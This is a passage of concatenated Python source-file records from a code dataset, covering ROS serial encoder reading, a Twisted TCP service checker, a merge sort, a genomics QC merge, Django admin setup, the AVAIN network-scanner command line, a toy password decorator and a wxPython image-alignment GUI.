True:\n\t\t\t#rospy.loginfo(\"Read C\")\n\t\t\tm=readChar(ser,0.1)\n\t\t\t#rospy.loginfo(m)\n\t\t\tif checkChar(m,b'\\x3D') == True:\n\t\t\t\t#rospy.loginfo(\"Read =\")\n\t\t\t\ti=0\n\t\t\t\treading = True\n\t\t\t\tmotor_1_encoder_count = 0\n\t\t\t\tmotor_2_encoder_count = 0\n\t\t\t\tread_second_encoder = False # False means motor channel 1; True means motor channel 2\n\t\t\t\tencoder_1_sign = 1.0\n\t\t\t\tencoder_2_sign = 1.0\n\t\t\t\twhile reading == True:\n\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\tif m == \"\\r\":\n\t\t\t\t\t\t#rospy.loginfo(\"Read end of line\")\n\t\t\t\t\t\treading = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tif m == b'\\x3A':\n\t\t\t\t\t\t\t#rospy.loginfo(\"Read colon\")\n\t\t\t\t\t\t\tread_second_encoder = True\n\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\tif read_second_encoder == False:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tencoder_1_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_1_encoder_count = motor_1_encoder_count*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_encoder = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tencoder_2_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_2_encoder_count = motor_2_encoder_count*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_encoder = True\n\t\t\t\tmsg_out.motor_1_encoder_count = 
motor_1_encoder_count*encoder_1_sign\n\t\t\t\tmsg_out.motor_2_encoder_count = motor_2_encoder_count*encoder_2_sign\n\t\tser.write(\"?S\\r\") # Request RPM\n\t\tm=readChar(ser,1.0)\n\t\tif checkChar(m,b'\\x53'):\n\t\t\t#rospy.loginfo(\"Read S\")\n\t\t\tm=readChar(ser,0.1)\n\t\t\t#rospy.loginfo(m)\n\t\t\tif checkChar(m,b'\\x3D'):\n\t\t\t\t#rospy.loginfo(\"Read =\")\n\t\t\t\ti=0\n\t\t\t\treading = True\n\t\t\t\tmotor_1_RPM = 0\n\t\t\t\tmotor_2_RPM = 0\n\t\t\t\tread_second_RPM = False # False means motor channel 1; True means motor channel 2\n\t\t\t\tRPM_1_sign = 1.0\n\t\t\t\tRPM_2_sign = 1.0\n\t\t\t\twhile reading == True:\n\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\tif m == \"\\r\":\n\t\t\t\t\t\t#rospy.loginfo(\"Read end of line\")\n\t\t\t\t\t\treading = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tif m == b'\\x3A':\n\t\t\t\t\t\t\t#rospy.loginfo(\"Read colon\")\n\t\t\t\t\t\t\tread_second_RPM = True\n\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\tif read_second_RPM == False:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tRPM_1_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_1_RPM = motor_1_RPM*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_RPM = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tRPM_2_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_2_RPM = motor_2_RPM*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_RPM = True\n\t\t\t\tmsg_out.motor_1_RPM = motor_1_RPM*RPM_1_sign\n\t\t\t\tmsg_out.motor_2_RPM = motor_2_RPM*RPM_2_sign\n\t\tpub.publish(msg_out)\n\t\tprior_time = time.clock()\n\t\tr = rospy.Rate(50)\n\t\tr.sleep()\n\ndef readChar(ser,timeout_time):\n\tinitial_time = time.clock()\n\ttimeout = False\n\tm = ser.read(1)\n\twhile (len(m) == 0) and (timeout == False):\n\t\tm = ser.read(1)\n\t\tcurrent_time = time.clock()\n\t\tif (current_time - initial_time) >= timeout_time:\n\t\t\ttimeout = True\n\t\telse:\n\t\t\ttimeout = False\n\treturn m\n\t\ndef checkChar(m,desired_char_hex):\n\tif m == desired_char_hex:\n\t\treturn True\n\telse:\n\t\treturn False\n\nif __name__ == '__main__':\n try:\n mis_speed2_node()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"roboteq_interface/scripts/mis_speed2_node.py","file_name":"mis_speed2_node.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575169368","text":"#! 
/usr/bin/env python\n#coding=utf-8\n###########################################################################\n#\n#\n# This software is copyrighted by Shenzhen Shangzhijie Technology Co., Ltd.; for more information visit www.netbase.asia\n#\n#\n###########################################################################\n\n__doc__ = \"\"\"\nIP service client\n\"\"\"\n\nimport re\nfrom twisted.internet import reactor,protocol,defer\nfrom products.netUtils.Utils import unused\nimport logging\nlog = logging.getLogger(\"netipservice\")\nfrom socket import getfqdn\nhostname = getfqdn()\n\nclass ZenTcpTest(protocol.Protocol):\n    \"\"\"\n    Purpose: open a TCP/IP connection to a remote IP service through the twisted framework and report the result\n    Author: wl\n    Date: 2013.1.30\n    \"\"\"\n    defer = None\n    data = \"\"\n\n    def connectionMade(self):\n        \"\"\"\n        Purpose: twisted hook, called once the connection is established; sends the test data\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        log.debug(\"Connected to %s\" % self.transport.getPeer().host)\n        self.factory.msg = \"pass\"\n        self.cfg = self.factory.cfg\n\n        if self.cfg.sendString:\n            sendString = self.cfg.sendString.decode(\"string_escape\")\n            log.debug(\"Sending: %s\",sendString)\n            self.transport.write(sendString)\n\n        if self.cfg.expectRegex:\n            log.debug(\"Waiting for results to check against regex '%s'\",\n                      self.cfg.expectRegex)\n            self.defer = reactor.callLater(self.cfg.timeout,self.expectTimeout)\n        else:\n            self.loseConnection()\n\n    def dataReceived(self,data):\n        \"\"\"\n        Purpose: twisted data-receive hook; matches the received data against the expected regex\n        Param: the received data\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        log.debug(\"%s %s received data: %s\",self.cfg.manageIp,\n                  self.cfg.title,data)\n        self.data += data\n        if self.cfg.expectRegex:\n            if re.search(self.cfg.expectRegex,data):\n                log.debug(\"Found %s in '%s' -- closing connection\",\n                          self.cfg.expectRegex,data)\n                self.loseConnection()\n            else:\n                log.debug(\"No match for %s in '%s' -- looking for more data\",\n                          self.cfg.expectRegex,data)\n\n    def expectTimeout(self):\n        \"\"\"\n        Purpose: handler for a timeout while waiting for the expected data\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        msg = \"IP Service %s TIMEOUT waiting for '%s'\" % (\n            self.cfg.title,self.cfg.expectRegex)\n        log.debug(\"%s %s\",self.cfg.manageIp,msg)\n        self.factory.msg = msg\n        self.loseConnection()\n\n    def loseConnection(self):\n        \"\"\"\n        Purpose: twisted hook, cleanup performed after the connection is dropped\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        ip,port = self.transport.addr\n        log.debug(\"Closed connection to %s on port %s for %s\",\n                  ip,port,self.cfg.title)\n        self.data = \"\"\n        try:\n            self.defer.cancel()\n        except:\n            self.defer = None\n        self.transport.loseConnection()\n\n\nclass NetTcpClient(protocol.ClientFactory):\n    \"\"\"\n    Purpose: twisted client factory class; starts the TCP connection\n    Author: wl\n    Date: 2013.1.30\n    \"\"\"\n    protocol = ZenTcpTest\n    msg = \"pass\"\n    deferred = None\n\n    def __init__(self,svc,status):\n        self.cfg = svc\n        self.status = status\n\n    def clientConnectionLost(self,connector,reason):\n        \"\"\"\n        Purpose: twisted client hook; handles a connection that was lost\n        Params: twisted protocol object, twisted error object\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        unused(connector)\n        errorMsg = reason.getErrorMessage()\n        if errorMsg != 'Connection was closed cleanly.':\n            log.debug(\"Lost connection to %s (%s) port %s: %s\",\n                      self.cfg.manageIp,self.cfg.manageIp,self.cfg.port,\n                      reason.getErrorMessage())\n        if self.deferred:\n            self.deferred.callback(self)\n            self.deferred = None\n\n    def clientConnectionFailed(self,connector,reason):\n        \"\"\"\n        Purpose: twisted client hook; handles a connection attempt that failed\n        Params: twisted protocol object, twisted error object\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        log.debug(\"Connection to %s (%s) port %s failed: %s\",\n                  self.cfg.manageIp,connector.host,self.cfg.port,\n                  reason.getErrorMessage())\n        self.msg = \"IP Service %s is down!\" % self.cfg.title\n        if self.deferred:\n            self.deferred.callback(self)\n            self.deferred = None\n\n    def 
getEvent(self):\n        \"\"\"\n        Purpose: build the event dict for this IP service check\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        if self.msg == \"pass\" and self.status > 0:\n            self.status = sev = 0\n            self.msg = \"IP Service %s back up\" % self.cfg.title\n\n        elif self.msg != \"pass\":\n            self.status += 1\n            sev = self.cfg.failSeverity\n\n        else:\n            self.status = sev = 0\n            self.msg = \"IP Service %s back up\" % self.cfg.title\n\n        return dict(manageIp = self.cfg.manageIp,\n\t\t\t\t    deviceId = self.cfg.deviceId,\n                    title=self.cfg.title,\n                    cuid=self.cfg.cuid,\n                    component = self.cfg.component,\n                    componentType = self.cfg.componentType,\n                    ipAddress = self.cfg.manageIp,\n                    summary = self.msg,\n                    severity = sev,\n                    eventClass = \"\",\n                    eventGroup = \"TCPTest\",\n                    agent = \"netipservice\",\n                    manager = hostname)\n\n    def start(self,ip_address):\n        \"\"\"\n        Purpose: start method\n        Param: ip string\n        Author: wl\n        Date: 2013.1.30\n        \"\"\"\n        d = self.deferred = defer.Deferred()\n        reactor.connectTCP(ip_address.encode(\"idna\"),self.cfg.port,self,3)\n        return d\n","sub_path":"products/netStatus/netTcpClient.py","file_name":"netTcpClient.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"134302711","text":"#Problem 2751: Sort Numbers 2\n#https://www.acmicpc.net/problem/2751\n\nimport sys\n\ncnt = int(sys.stdin.readline())\n\narr = []\nfor i in range(cnt):\n    arr.append(int(sys.stdin.readline()))\n\ndef merge_sort(arr):\n    if len(arr) < 2:\n        return arr\n    \n    mid = len(arr)//2\n    right = merge_sort(arr[:mid])\n    left = merge_sort(arr[mid:])\n\n    merged_arr = []\n    l = h = 0\n    while l < len(right) and h < len(left):\n        if right[l] < left[h]:\n            merged_arr.append(right[l])\n            l += 1\n        else:\n            merged_arr.append(left[h])\n            h += 1\n    \n    merged_arr += right[l:]\n    merged_arr += left[h:]\n    return merged_arr\n\n\narr = merge_sort(arr)\nfor i in arr:\n    print(i)\n","sub_path":"12_정렬/[02]2751번_수정렬하기_2.py","file_name":"[02]2751번_수정렬하기_2.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441494808","text":"\"\"\"\nWrite out merge variant result\n\"\"\"\n\nwith open(\"../temp/VariantQC.txt\", \"w\") as FileOut:\n\n    Header = ['CHROM', 'POS', 'ID',\n              'REF', 'ALT', 'QUAL',\n              'Coverage', 'nHet', 'nHomRef',\n              'nHomVar', 'nCalled', 'nNotCalled', '\\n']\n    FileOut.write('\\t'.join(Header))\n\n    First = True\n    for StrIn in open(\"../temp/temp.txt\"):\n        if First == True:\n            First = False\n            pass\n        else:\n            TempStr = StrIn.split('\\t')\n\n            nHet = int(TempStr[7])\n            for i in range(13,115,6):\n                nHet += int(TempStr[i])\n\n            nHomRef = int(TempStr[8])\n            for i in range(14, 116, 6):\n                nHomRef += int(TempStr[i])\n\n            nHomVar = int(TempStr[9])\n            for i in range(15, 117, 6):\n                nHomVar += int(TempStr[i])\n\n            nCalled = int(TempStr[10])\n            for i in range(16, 118, 6):\n                nCalled += int(TempStr[i])\n\n            nNotCalled = int(TempStr[11])\n            for i in range(17, 119, 6):\n                nNotCalled += int(TempStr[i])\n\n            StrOut = TempStr[0:7]\n            StrOut.append( str(nHet) )\n            StrOut.append( str(nHomRef) )\n            StrOut.append( str(nHomVar) )\n            StrOut.append( str(nCalled) )\n            StrOut.append( str(nNotCalled) )\n            StrOut.append( '\\n' )\n            FileOut.write( '\\t'.join(StrOut) )\nFileOut.close()\n","sub_path":"1.QC_pipeline_local_HPC/Step4_Merge_Variant_2.py","file_name":"Step4_Merge_Variant_2.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"110021021","text":"from django.contrib import admin\n\nfrom subform.models import 
Owner, Submission, PdbRef, SubPdb, PubMedRef\n\n\n\nclass SubPdbInLine( admin.TabularInline ):\n model = SubPdb\n extra = 1\n\n\nclass SubPubMedInLine( admin.TabularInline ):\n model = PubMedRef.submission.through\n extra = 1\n\nclass PubMedRefAdmin( admin.ModelAdmin ):\n inlines = (SubPubMedInLine,)\n\nclass SubmissionAdmin( admin.ModelAdmin ):\n inlines = ( SubPdbInLine, SubPubMedInLine )\n\nclass PdbRefAdmin( admin.ModelAdmin ):\n inlines = (SubPdbInLine,)\n\nclass SubmissionInLine(admin.StackedInline):\n model = Submission\n #inlines = (SubPdbInLine)\n extra = 1\n\nclass OwnerAdmin(admin.ModelAdmin):\n #fields = ['myt_id', 'username', 'passwd', 'fname', 'lname', 'myt_server_url', 'email_addr' ]\n fieldsets = [\n\t( 'mytardis login info', { 'fields' : [ 'myt_id', 'username', 'passwd', 'myt_server_url' ] } ),\n\t( 'owner details', { 'fields' : [ 'fname', 'lname', 'email_addr' ]} )\n\t]\n inlines = [SubmissionInLine]\n\nadmin.site.register( Owner, OwnerAdmin )\nadmin.site.register( Submission, SubmissionAdmin )\nadmin.site.register( PdbRef, PdbRefAdmin )\nadmin.site.register( PubMedRef, PubMedRefAdmin )\n\n\n\n# Register your models here.\n","sub_path":"subform/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"414294091","text":"import glob\nimport logging\nimport json\nfrom stanfordcorenlp import StanfordCoreNLP\nfrom PetrXmlConverter import *\n\n\nclass FromCorenlpConverter(PetrXmlConverter):\n def __init__(self, input_path, output_path='', corenlp_path='', port=8000, memory='4g', lang='zh', timeout=1500,\n quiet=True, logging_level=logging.WARNING):\n PetrXmlConverter.__init__(self, input_path, output_path)\n\n self.corenlp_path = corenlp_path\n if self.corenlp_path == '' and not self.find_corenlp():\n raise IOError('Could not find stanford corenlp.')\n self.nlp = StanfordCoreNLP(self.corenlp_path, port, memory, lang, timeout, quiet, logging_level)\n\n print('\\033[1;32m'+'Starting up StanfordCoreNLP...'+'\\033[0m')\n\n def __del__(self):\n self.nlp.close()\n print('\\033[1;32m'+'Corenlp closed!'+'\\033[0m')\n\n def generate_events(self):\n with open(self.input_path, 'r') as source:\n for line in source.readlines():\n if not len(line) == 0:\n properties = line.replace('\\n', '').split('|')\n event = {\n Attr.id: properties[0],\n Attr.date: properties[4].split(' ')[0].replace('-', ''),\n Attr.source: properties[6],\n Attr.url: properties[9]\n }\n content = re.sub(r'\\s', '', properties[8])\n # parse = self.parse(content)\n # event[Attr.content] = self.sep_sentence(parse)\n event[Attr.content] = self.sep_sentence(content)\n print('parse event {0}'.format(event[Attr.id]))\n self.events.append(event)\n\n def parse(self, text):\n return self.nlp.parse(text)\n\n def find_corenlp(self):\n corenlp_paths = glob.glob(\"stanford-corenlp-full-[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]\")\n if len(corenlp_paths) == 0:\n return False\n else:\n corenlp_paths.sort()\n self.corenlp_path = corenlp_paths[-1]\n return True\n","sub_path":"FromCorenlpConverter.py","file_name":"FromCorenlpConverter.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"162048726","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport os\n\nfrom core.controller import Controller\nfrom core.result_types import ResultType\nimport core.utility as util\n\n# The following metadata applies to all 
source code files of AVAIN\n__author__ = \"Dustin Born\"\n__version__ = \"0.1.2\"\n__license__ = \"MIT\"\n\n\nUSER_RESULT_ARGS = {ResultType.SCAN: (\"-sR\", \"--scan-results\"),\n ResultType.VULN_SCORE: (\"-vS\", \"--vulnerability-scores\"),\n ResultType.WEBSERVER_MAP: (\"-wM\", \"--webserver-map\")}\n\nclass Cli():\n\n def __init__(self):\n \"\"\"\n Create a Cli object.\n \"\"\"\n self.args = None\n self.user_results = {}\n self.verbose = True # make AVAIN verbose by default\n\n def parse_arguments(self):\n \"\"\"\n Parse the command line arguments using ArgumentParser\n\n :param args: the raw program arguments as a list (e.g. sys.argv)\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"Automated Vulnerability Analysis (in) IP-based \" +\n \"Networks - A toolkit for automatically assessing \" +\n \"the securtiy level of an IP-based network\", prog=\"avain\")\n optional_args = parser._action_groups.pop()\n required_args = parser.add_argument_group(\"required arguments (at least one)\")\n parser._action_groups.append(optional_args)\n\n required_args.add_argument(\"-n\", \"--networks\", nargs=\"+\", help=\"specify networks to scan \" +\n \"as plain IP address or IP address in CIDR, range or wildcard notation\")\n required_args.add_argument(\"-nL\", \"--network-list\", help=\"a list that specifies networks \" +\n \"to include into or exclude from the scan\")\n required_args.add_argument(\"-uM\", \"--update-modules\", action=\"store_true\", help=\"make \" +\n \"the modules that have an update mechanism update\")\n for rtype, args in USER_RESULT_ARGS.items():\n required_args.add_argument(args[0], args[1], nargs=\"+\", help=\"specify additional \" +\n \"%s results to include into the final scan result\" %\n rtype.value)\n\n optional_args.add_argument(\"-c\", \"--config\", help=\"specify a config file to use\")\n optional_args.add_argument(\"-o\", \"--output\", help=\"specify the output folder name\")\n optional_args.add_argument(\"-p\", \"--ports\", help=\"specify which ports to scan on every host\")\n optional_args.add_argument(\"-sN\", \"--single-network\", action=\"store_true\", help=\"operate \" +\n \"in single network mode meaning that all specified networks \" +\n \"are considered to be a subnet of one common supernet\")\n optional_args.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"enable verbose output\")\n optional_args.add_argument(\"-nV\", \"--non-verbose\", action=\"store_true\", help=\"disable verbose output\")\n\n self.args = parser.parse_args()\n\n # set verbosity (AVAIN is verbose by default)\n if self.args.non_verbose:\n self.verbose = False\n\n self.parse_user_results(parser)\n if (not self.args.networks) and (not self.args.network_list) and (not self.user_results) \\\n and (not self.args.update_modules):\n parser.error(\"at least one of the following arguments is required: -n/--network, \" +\n \"-nL/--network-list, -uD/--update-modules or any one of [%s]\" %\n \", \".join(\"%s/%s\" % rarg for rarg in USER_RESULT_ARGS.values()))\n\n self.parse_network_list(parser)\n self.validate_input(parser)\n\n def validate_input(self, parser: argparse.ArgumentParser):\n \"\"\"\n Validate the program arguments of the given ArgumentParser.\n\n :param parser: an ArgumentParser with input arguments\n \"\"\"\n\n if self.args.networks:\n for net in self.args.networks:\n if not util.is_valid_net_addr(net):\n parser.error(\"%s is not a valid network address\" % net)\n\n if self.args.network_list:\n for ip in self.args.add_networks:\n if not util.is_valid_net_addr(ip):\n 
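# abort on the first malformed entry in the include list\n                    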
parser.error(\"network %s on network list is not a valid network address\" % ip)\n for ip in self.args.omit_networks:\n if not util.is_valid_net_addr(ip):\n parser.error(\"network %s on network omit list is not a valid network address\" % ip)\n\n if self.args.output:\n pass # so far no limitation on output name\n\n if self.user_results:\n for rtype in ResultType:\n if rtype in self.user_results:\n filepaths = self.user_results[rtype]\n for filepath in filepaths:\n if not os.path.isfile(filepath):\n parser.error(\"specified %s result %s is not a file\" % (rtype.value, filepath))\n\n if self.args.config:\n if not os.path.isfile(self.args.config):\n parser.error(\"config %s does not exist\" % self.args.config)\n\n if self.args.ports:\n def check_port(port_expr: str):\n try:\n port_int = int(port_expr)\n if port_int < 0 or port_int > 65535:\n raise ValueError\n except ValueError:\n parser.error(\"port %s is not a valid port\" % port_expr)\n\n for port_expr in self.args.ports.split(\",\"):\n if \":\" in port_expr:\n port_expr = port_expr[port_expr.find(\":\")+1:]\n if \"-\" in port_expr:\n port_1, port_2 = port_expr.split(\"-\")\n check_port(port_1)\n check_port(port_2)\n if int(port_1) > int(port_2):\n parser.error(\"port range %s is not a valid port range\" % port_expr)\n else:\n check_port(port_expr)\n\n def start(self):\n \"\"\"\n Parse the program arguments and initiate the vulnerability analysis.\n \"\"\"\n\n controller = Controller(self.args.networks, self.args.add_networks, self.args.omit_networks,\n self.args.update_modules, self.args.config, self.args.ports,\n self.args.output, self.user_results, self.args.single_network,\n self.verbose)\n controller.run()\n\n def parse_network_list(self, parser: argparse.ArgumentParser):\n \"\"\"\n Parse the network list contained in the given ArgumentParser (if it exists).\n\n :param parser: an ArgumentParser processing program arguments\n \"\"\"\n\n self.args.add_networks, self.args.omit_networks = [], []\n if not self.args.network_list:\n return\n\n if not os.path.isfile(self.args.network_list):\n parser.error(\"network list %s does not exist\" % self.args.network_list)\n\n with open(self.args.network_list) as file:\n for line in file:\n line = line.strip()\n if line.startswith(\"+\"):\n self.args.add_networks.append(line[1:].strip())\n elif line.startswith(\"-\"):\n self.args.omit_networks.append(line[1:].strip())\n else:\n self.args.add_networks.append(line)\n\n def parse_user_results(self, parser: argparse.ArgumentParser):\n self.user_results = {}\n for rtype, args in USER_RESULT_ARGS.items():\n filepaths = vars(self.args).get(args[1][2:].replace(\"-\", \"_\"), None)\n if filepaths:\n for filepath in filepaths:\n if not filepath:\n parser.error(\"%s results specified, by no filepath was found\" % rtype.value)\n else:\n if rtype not in self.user_results:\n self.user_results[rtype] = []\n self.user_results[rtype].append(filepath)\n\n\ndef banner():\n print(\"|\" + \"-\" * 78 + \"|\")\n print(\n\"\"\"\\\n| |\n| ___ _ __ ___ ____ _ __ |\n| / || | / // | / _// | / / |\n| / /| || | / // /| | / / / |/ / |\n| / ___ || |/ // ___ | _/ / / /| / |\n| /_/ |_||___//_/ |_|/___//_/ |_/ |\n| |\\\n\"\"\")\n print(\"|\" + \" \" * 25 + \"[ Created by - Dustin Born ]\" + \" \" * 25 + \"|\")\n print(\"|\" + \"-\" * 78 + \"|\")\n print()\n\n\n#########################################\n### Entry point for the AVAIN program ###\n#########################################\nif __name__ == \"__main__\":\n banner()\n # Extend search path for modules\n MODULE_DIR = 
os.path.dirname(\"modules\")\n    sys.path.append(MODULE_DIR)\n\n    # Start program\n    CLI = Cli()\n    CLI.parse_arguments()\n    CLI.start()\n","sub_path":"avain.py","file_name":"avain.py","file_ext":"py","file_size_in_byte":9339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367541665","text":"# Define the topsecret decorator in two ways, as a function and as a class; it guards highly classified functions;\n# the decorator takes an int secrecy level as its argument;\n# a decorated function only runs after the correct execution password is entered;\n# the password length differs by secrecy level;\n# passwords are stored in a dictionary;\n# define a nuclear-launch function bomb(), decorated with toplevel at secrecy level 3;\n# define getAccountById(id), which looks up a bank balance by ID number, decorated with toplevel at secrecy level 2;\n##########################################################################\n\nfrom functools import wraps\n\n\nclass topsecret:\n    LEVEL_MINISTER = 2\n    LEVEL_PRESIDENT = 3\n\n    pwds = {LEVEL_MINISTER: \"123\", LEVEL_PRESIDENT: \"123456\"}\n\n    level = 0\n\n    def __init__(self, level=0):\n        self.level = level\n\n    def __call__(self, func):\n        @wraps(func)\n        def inner(*args, **kwargs):\n            pwd = input(\"Enter password:\")\n            if pwd == topsecret.pwds[self.level]:\n                print(\"Password accepted!\")\n                func(*args, **kwargs)\n                print(\"Launch successful!\")\n            else:\n                print(\"You have no authority!\")\n\n        return inner\n\n\n@topsecret(level=topsecret.LEVEL_PRESIDENT)\ndef bomb(Giver):\n    print(\"10,,,,,5,,3,2,1,ignition,\\n....................\\\n    \\n................\\n............\\nBOOOOOOOOOOOOMB!!!!!!!!\")\n\n\n##########################################################################\n# LEVEL_MINISTER = 2\n# LEVEL_PRESIDENT = 3\n# pwds = {LEVEL_MINISTER: 123, LEVEL_PRESIDENT: 123456}\n# IdLibrary = [\n#     50010219951,\n#     50010219952,\n#     50010219953,\n#     50010219954,\n#     50010219955,\n#     50010219956,\n#     50010219957,\n#     50010219958,\n#     50010219959,\n# ]\n\n# def toplevel(level):  # accept the decorator argument\n#     def wrapper(func):  # accept the function\n#         def inner(*args):  # accept the function's arguments\n#             if args[2] == pwds[args[1]]:  # positional arguments arrive as a tuple\n#                 for cad in IdLibrary:\n#                     if args[0] == cad:\n#                         print(\"ID verified\")\n#                         func(args[0])\n#                         break\n\n#         return inner\n\n#     return wrapper\n\n# @toplevel(level=LEVEL_MINISTER)\n# def getAccountById(ad):\n#     print(ad, \", You have no money!\")\n\n##########################################################################\n\nif __name__ == '__main__':\n    Giver = input(\"Enter your name:\")\n    bomb(Giver)\n    # ad, level, password = eval(input(\"Enter your ID,level,password:\"))\n    # getAccountById(ad, level, password)\n","sub_path":"homework/python language programming/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"180132976","text":"import wx\nimport scipy as sp\nimport imreg_dft as ird\nimport PyQt5\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QImage\nimport os\nfrom threading import Thread\nimport skimage\n\nThumbMaxSize = 360\nedges1File = 'image1edges.jpg'\nedges2File = 'image2edges.jpg'\nimage2scaledFile = \"image2scaled.jpg\"\noverlayFile = 'overlay.jpg'\nOutputMaxSize = 360\nNoFileSelected = \"No File Selected\"\n\n# Define File Drop Target class\nclass FileDropTarget(wx.FileDropTarget):\n\n    def __init__(self, obj, imageCtrl, frame):\n        \"\"\" Initialize the Drop Target, passing in the Object Reference to\n        indicate what should receive the dropped files \"\"\"\n        # Initialize the wxFileDropTarget Object\n        wx.FileDropTarget.__init__(self)\n        self.obj = obj\n        self.imageCtrl = imageCtrl\n        self.frame = frame\n\n    def OnDropFiles(self, x, y, filenames):\n        # display filename to gui\n        self.obj.Clear()\n        file = filenames[0]\n        self.obj.WriteText(file)\n        \n        # read in 
image file\n img = wx.Image(file, wx.BITMAP_TYPE_ANY)\n\n # scale down image into a thumbnail\n W = img.GetWidth()\n H = img.GetHeight()\n if W > H:\n NewW = ThumbMaxSize\n NewH = ThumbMaxSize * H / W\n else:\n NewH = ThumbMaxSize\n NewW = ThumbMaxSize * W / H\n imgThumb = img.Scale(NewW,NewH)\n\n # assign image to image control\n self.imageCtrl.SetBitmap(wx.Bitmap(imgThumb))\n self.frame.Refresh()\n\n return True\n\nclass MainWindow(wx.Frame):\n \"\"\" This window displays the GUI Widgets. \"\"\"\n def __init__(self,parent,id,title):\n wx.Frame.__init__(self,parent, wx.ID_ANY, title, size = (800,900), style=wx.DEFAULT_FRAME_STYLE|wx.NO_FULL_REPAINT_ON_RESIZE)\n self.SetBackgroundColour(wx.WHITE)\n\n # define text\n wx.StaticText(self, -1, \"Drag and Drop Image File 1\", (10, 15))\n wx.StaticText(self, -1, \"Drag and Drop Image File 2\", (410, 15))\n self.text1 = wx.TextCtrl(self, -1, \"\", pos=(10,35), size=(360,20), style = wx.TE_READONLY)\n self.text2 = wx.TextCtrl(self, -1, \"\", pos=(410,35), size=(360,20), style = wx.TE_READONLY)\n self.text1.WriteText(NoFileSelected)\n self.text2.WriteText(NoFileSelected)\n self.alignStatus = wx.StaticText(self, -1, \"Aligning...Please Wait\", (520,485))\n self.alignStatus.Hide()\n\n # define images\n img1 = wx.Image(ThumbMaxSize,ThumbMaxSize)\n img2 = wx.Image(ThumbMaxSize,ThumbMaxSize)\n img3 = wx.Image(OutputMaxSize, OutputMaxSize)\n self.imageCtrl1 = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(img1), pos=(10,65))\n self.imageCtrl2 = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(img2), pos=(410,65))\n self.imageCtrl3 = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(img3), pos=(10,450))\n\n # Create a File Drop Target object\n dt1 = FileDropTarget(self.text1, self.imageCtrl1, self)\n dt2 = FileDropTarget(self.text2, self.imageCtrl2, self)\n\n # define check box and buttons\n self.detectEdges = wx.CheckBox(self, -1, \"Detect Edges\", pos = (410,450))\n buttonAlign = wx.Button(self, -1, \"Align\", pos=(410,480))\n buttonAlign.Bind(wx.EVT_BUTTON, self.onAlign)\n buttonCopyToClipboard = wx.Button(self, -1, \"Copy Image To Clipboard\", pos=(410,510))\n buttonCopyToClipboard.Bind(wx.EVT_BUTTON, self.onCopyToClipboard)\n\n # Link the Drop Target Object to the Image Control\n self.imageCtrl1.SetDropTarget(dt1)\n self.imageCtrl2.SetDropTarget(dt2)\n\n # Display the Window\n self.Show(True)\n\n def onAlign(self, button):\n # get paths\n path1 = 